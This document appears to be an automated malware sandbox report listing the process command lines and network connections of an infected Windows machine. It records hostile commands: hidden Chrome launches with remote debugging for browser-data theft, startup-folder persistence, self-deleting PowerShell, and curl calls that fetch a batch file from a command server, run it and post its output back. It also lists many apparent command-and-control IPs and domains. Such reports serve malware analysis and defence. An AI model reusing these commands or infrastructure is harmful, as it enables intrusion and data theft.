"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5196,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5188 /prefetch:8
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\Admin\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5348,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:8
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x120,0xf4,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0x114,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Windows\explorer.exe
explorer.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
Network
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | rddissisifigifidi.net | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 162.159.135.232:443 | discord.com | tcp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | educational-reform.gl.at.ply.gg | udp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| BG | 195.230.23.72:80 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | chrome.google.com | udp |
| FR | 142.250.179.78:443 | chrome.google.com | tcp |
| US | 8.8.8.8:53 | 164.20.217.172.in-addr.arpa | udp |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| FR | 172.217.20.206:443 | clients2.google.com | tcp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| IN | 43.240.65.55:81 | 43.240.65.55 | tcp |
| US | 8.8.8.8:53 | 33.177.156.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.74.250.142.in-addr.arpa | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 8.8.8.8:53 | 55.65.240.43.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| DE | 212.113.107.84:80 | 212.113.107.84 | tcp |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | 75.184.154.165.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.107.113.212.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| TH | 165.154.184.75:80 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| CN | 114.55.106.136:80 | tcp | |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 147.185.221.22:49922 | educational-reform.gl.at.ply.gg | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| HK | 47.244.167.171:801 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 104.21.45.165:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | 165.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| CN | 112.124.68.87:2222 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| CN | 1.94.204.34:4444 | tcp | |
